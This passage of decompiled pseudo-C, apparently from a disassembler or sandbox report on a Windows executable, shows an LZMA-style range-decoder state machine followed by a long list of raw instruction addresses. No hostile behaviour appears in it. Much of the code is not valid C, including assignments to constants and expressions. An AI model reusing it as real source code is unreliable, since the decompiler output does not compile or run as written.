                          												__eax =  *(__ebp - 4);
                          												__eax =  *(__ebp - 4) + 0x664;
                          												__eflags = __eax;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L69;
                          											}
                          											__eax =  *(__ebp - 4);
                          											__ecx =  *(__ebp - 0x38);
                          											 *(__ebp - 0x84) = 8;
                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          											goto L132;
                          										case 8:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xa;
                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          											} else {
                          												__eax =  *(__ebp - 0x38);
                          												__ecx =  *(__ebp - 4);
                          												__eax =  *(__ebp - 0x38) + 0xf;
                          												 *(__ebp - 0x84) = 9;
                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          											}
                          											goto L132;
                          										case 9:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												goto L90;
                          											}
                          											__eflags =  *(__ebp - 0x60);
                          											if( *(__ebp - 0x60) == 0) {
                          												goto L171;
                          											}
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                          											__eflags = _t259;
                          											0 | _t259 = _t259 + _t259 + 9;
                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                          											goto L76;
                          										case 0xa:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xb;
                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											__eax =  *(__ebp - 0x28);
                          											goto L89;
                          										case 0xb:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__ecx =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x20);
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          											} else {
                          												__eax =  *(__ebp - 0x24);
                          											}
                          											__ecx =  *(__ebp - 0x28);
                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          											L89:
                          											__ecx =  *(__ebp - 0x2c);
                          											 *(__ebp - 0x2c) = __eax;
                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          											L90:
                          											__eax =  *(__ebp - 4);
                          											 *(__ebp - 0x80) = 0x15;
                          											__eax =  *(__ebp - 4) + 0xa68;
                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          											goto L69;
                          										case 0xc:
                          											L100:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xc;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t335 = __ebp - 0x70;
                          											 *_t335 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t335;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											__eax =  *(__ebp - 0x2c);
                          											goto L102;
                          										case 0xd:
                          											L37:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xd;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t122 = __ebp - 0x70;
                          											 *_t122 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t122;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L39:
                          											__eax =  *(__ebp - 0x40);
                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          												goto L48;
                          											}
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												goto L54;
                          											}
                          											L41:
                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          											 *(__ebp - 0x48) = __eax;
                          											__eax = __eax + 1;
                          											__eax = __eax << 8;
                          											__eax = __eax + __ebx;
                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edx = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												 *(__ebp - 0x40) = 1;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												__ebx = __ebx + __ebx + 1;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edx;
                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L39;
                          											} else {
                          												goto L37;
                          											}
                          										case 0xe:
                          											L46:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t156 = __ebp - 0x70;
                          											 *_t156 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t156;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											while(1) {
                          												L48:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t170 = __edx + 1; // 0x1
                          													__ebx = _t170;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													continue;
                          												} else {
                          													goto L46;
                          												}
                          											}
                          											L54:
                          											_t173 = __ebp - 0x34;
                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          											__eflags =  *_t173;
                          											goto L55;
                          										case 0xf:
                          											L58:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xf;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t203 = __ebp - 0x70;
                          											 *_t203 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t203;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L60:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												L55:
                          												__al =  *(__ebp - 0x44);
                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          												goto L56;
                          											}
                          											L61:
                          											__eax =  *(__ebp - 0x58);
                          											__edx = __ebx + __ebx;
                          											__ecx =  *(__ebp - 0x10);
                          											__esi = __edx + __eax;
                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												_t217 = __edx + 1; // 0x1
                          												__ebx = _t217;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L60;
                          											} else {
                          												goto L58;
                          											}
                          										case 0x10:
                          											L110:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x10;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t366 = __ebp - 0x70;
                          											 *_t366 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t366;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											goto L112;
                          										case 0x11:
                          											L69:
                          											__esi =  *(__ebp - 0x58);
                          											 *(__ebp - 0x84) = 0x12;
                          											L132:
                          											 *(_t612 - 0x54) = _t605;
                          											goto L133;
                          										case 0x12:
                          											goto L0;
                          										case 0x13:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												_t469 = __ebp - 0x58;
                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                          												__eflags =  *_t469;
                          												 *(__ebp - 0x30) = 0x10;
                          												 *(__ebp - 0x40) = 8;
                          												goto L144;
                          											}
                          											__eax =  *(__ebp - 0x4c);
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											 *(__ebp - 0x30) = 8;
                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          											goto L130;
                          										case 0x14:
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          											__eax =  *(__ebp - 0x80);
                          											L140:
                          											 *(_t612 - 0x88) = _t533;
                          											goto L1;
                          										case 0x15:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          											__al = __al & 0x000000fd;
                          											__eax = (__eflags >= 0) - 1 + 0xb;
                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          											goto L121;
                          										case 0x16:
                          											__eax =  *(__ebp - 0x30);
                          											__eflags = __eax - 4;
                          											if(__eax >= 4) {
                          												_push(3);
                          												_pop(__eax);
                          											}
                          											__ecx =  *(__ebp - 4);
                          											 *(__ebp - 0x40) = 6;
                          											__eax = __eax << 7;
                          											 *(__ebp - 0x7c) = 0x19;
                          											 *(__ebp - 0x58) = __eax;
                          											goto L145;
                          										case 0x17:
                          											goto L145;
                          										case 0x18:
                          											L146:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x18;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t484 = __ebp - 0x70;
                          											 *_t484 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t484;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L148:
                          											_t487 = __ebp - 0x48;
                          											 *_t487 =  *(__ebp - 0x48) - 1;
                          											__eflags =  *_t487;
                          											goto L149;
                          										case 0x19:
                          											__eflags = __ebx - 4;
                          											if(__ebx < 4) {
                          												 *(__ebp - 0x2c) = __ebx;
                          												L120:
                          												_t394 = __ebp - 0x2c;
                          												 *_t394 =  *(__ebp - 0x2c) + 1;
                          												__eflags =  *_t394;
                          												L121:
                          												__eax =  *(__ebp - 0x2c);
                          												__eflags = __eax;
                          												if(__eax == 0) {
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          													goto L170;
                          												}
                          												__eflags = __eax -  *(__ebp - 0x60);
                          												if(__eax >  *(__ebp - 0x60)) {
                          													goto L171;
                          												}
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          												__eax =  *(__ebp - 0x30);
                          												_t401 = __ebp - 0x60;
                          												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          												__eflags =  *_t401;
                          												goto L124;
                          											}
                          											__ecx = __ebx;
                          											__eax = __ebx;
                          											__ecx = __ebx >> 1;
                          											__eax = __ebx & 0x00000001;
                          											__ecx = (__ebx >> 1) - 1;
                          											__al = __al | 0x00000002;
                          											__eax = (__ebx & 0x00000001) << __cl;
                          											__eflags = __ebx - 0xe;
                          											 *(__ebp - 0x2c) = __eax;
                          											if(__ebx >= 0xe) {
                          												__ebx = 0;
                          												 *(__ebp - 0x48) = __ecx;
                          												L103:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__eax = __eax + __ebx;
                          													 *(__ebp - 0x40) = 4;
                          													 *(__ebp - 0x2c) = __eax;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x644;
                          													__eflags = __eax;
                          													L109:
                          													__ebx = 0;
                          													 *(__ebp - 0x58) = __eax;
                          													 *(__ebp - 0x50) = 1;
                          													 *(__ebp - 0x44) = 0;
                          													 *(__ebp - 0x48) = 0;
                          													L113:
                          													__eax =  *(__ebp - 0x40);
                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          														_t392 = __ebp - 0x2c;
                          														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                          														__eflags =  *_t392;
                          														goto L120;
                          													}
                          													__eax =  *(__ebp - 0x50);
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          													__eax =  *(__ebp - 0x58);
                          													__esi = __edi + __eax;
                          													 *(__ebp - 0x54) = __esi;
                          													__ax =  *__esi;
                          													__ecx = __ax & 0x0000ffff;
                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          													__eflags =  *(__ebp - 0xc) - __edx;
                          													if( *(__ebp - 0xc) >= __edx) {
                          														__ecx = 0;
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          														__ecx = 1;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          														__ebx = 1;
                          														__ecx =  *(__ebp - 0x48);
                          														__ebx = 1 << __cl;
                          														__ecx = 1 << __cl;
                          														__ebx =  *(__ebp - 0x44);
                          														__ebx =  *(__ebp - 0x44) | __ecx;
                          														__cx = __ax;
                          														__cx = __ax >> 5;
                          														__eax = __eax - __ecx;
                          														__edi = __edi + 1;
                          														__eflags = __edi;
                          														 *(__ebp - 0x44) = __ebx;
                          														 *__esi = __ax;
                          														 *(__ebp - 0x50) = __edi;
                          													} else {
                          														 *(__ebp - 0x10) = __edx;
                          														0x800 = 0x800 - __ecx;
                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          														 *__esi = __dx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L112:
                          														_t369 = __ebp - 0x48;
                          														 *_t369 =  *(__ebp - 0x48) + 1;
                          														__eflags =  *_t369;
                          														goto L113;
                          													} else {
                          														goto L110;
                          													}
                          												}
                          												__ecx =  *(__ebp - 0xc);
                          												__ebx = __ebx + __ebx;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          													__ecx =  *(__ebp - 0x10);
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													__ebx = __ebx | 0x00000001;
                          													__eflags = __ebx;
                          													 *(__ebp - 0x44) = __ebx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													L102:
                          													_t339 = __ebp - 0x48;
                          													 *_t339 =  *(__ebp - 0x48) - 1;
                          													__eflags =  *_t339;
                          													goto L103;
                          												} else {
                          													goto L100;
                          												}
                          											}
                          											__edx =  *(__ebp - 4);
                          											__eax = __eax - __ebx;
                          											 *(__ebp - 0x40) = __ecx;
                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          											goto L109;
                          										case 0x1a:
                          											L56:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1a;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x68);
                          											__al =  *(__ebp - 0x5c);
                          											__edx =  *(__ebp - 8);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          											 *( *(__ebp - 0x68)) = __al;
                          											__ecx =  *(__ebp - 0x14);
                          											 *(__ecx +  *(__ebp - 8)) = __al;
                          											__eax = __ecx + 1;
                          											__edx = 0;
                          											_t192 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t192;
                          											goto L80;
                          										case 0x1b:
                          											L76:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1b;
                          												goto L170;
                          											}
                          											__eax =  *(__ebp - 0x14);
                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          											__eflags = __eax -  *(__ebp - 0x74);
                          											if(__eax >=  *(__ebp - 0x74)) {
                          												__eax = __eax +  *(__ebp - 0x74);
                          												__eflags = __eax;
                          											}
                          											__edx =  *(__ebp - 8);
                          											__cl =  *(__eax + __edx);
                          											__eax =  *(__ebp - 0x14);
                          											 *(__ebp - 0x5c) = __cl;
                          											 *(__eax + __edx) = __cl;
                          											__eax = __eax + 1;
                          											__edx = 0;
                          											_t275 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t275;
                          											__eax =  *(__ebp - 0x68);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											_t284 = __ebp - 0x64;
                          											 *_t284 =  *(__ebp - 0x64) - 1;
                          											__eflags =  *_t284;
                          											 *( *(__ebp - 0x68)) = __cl;
                          											L80:
                          											 *(__ebp - 0x14) = __edx;
                          											goto L81;
                          										case 0x1c:
                          											while(1) {
                          												L124:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t415 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t415;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          												__eflags =  *(__ebp - 0x30);
                          												 *( *(__ebp - 0x68)) = __cl;
                          												 *(__ebp - 0x14) = _t415;
                          												if( *(__ebp - 0x30) > 0) {
                          													continue;
                          												} else {
                          													L81:
                          													 *(__ebp - 0x88) = 2;
                          													goto L1;
                          												}
                          											}
                          											 *(__ebp - 0x88) = 0x1c;
                          											L170:
                          											_push(0x22);
                          											_pop(_t567);
                          											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                          											_t535 = 0;
                          											L172:
                          											return _t535;
                          									}
                          								}
                          								L171:
                          								_t535 = _t534 | 0xffffffff;
                          								goto L172;
                          							}
                          						}
                          						__eax =  *(__ebp - 0x50);
                          						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          						__eax =  *(__ebp - 0x58);
                          						__esi = __edx + __eax;
                          						 *(__ebp - 0x54) = __esi;
                          						__ax =  *__esi;
                          						__edi = __ax & 0x0000ffff;
                          						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          						if( *(__ebp - 0xc) >= __ecx) {
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          							__cx = __ax;
                          							__cx = __ax >> 5;
                          							__eax = __eax - __ecx;
                          							__edx = __edx + 1;
                          							 *__esi = __ax;
                          							 *(__ebp - 0x50) = __edx;
                          						} else {
                          							 *(__ebp - 0x10) = __ecx;
                          							0x800 = 0x800 - __edi;
                          							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          							 *__esi = __cx;
                          						}
                          						if( *(__ebp - 0x10) >= 0x1000000) {
                          							goto L148;
                          						} else {
                          							goto L146;
                          						}
                          					}
                          					goto L1;
                          				}
                          			}








                          0x00000000
                          0x00406682
                          0x00406682
                          0x00406686
                          0x004066ab
                          0x004066b5
                          0x00000000
                          0x00406688
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406695
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00406776
                          0x00406776
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00406734
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x00000000
                          0x004068bc
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x00000000
                          0x004060d9
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
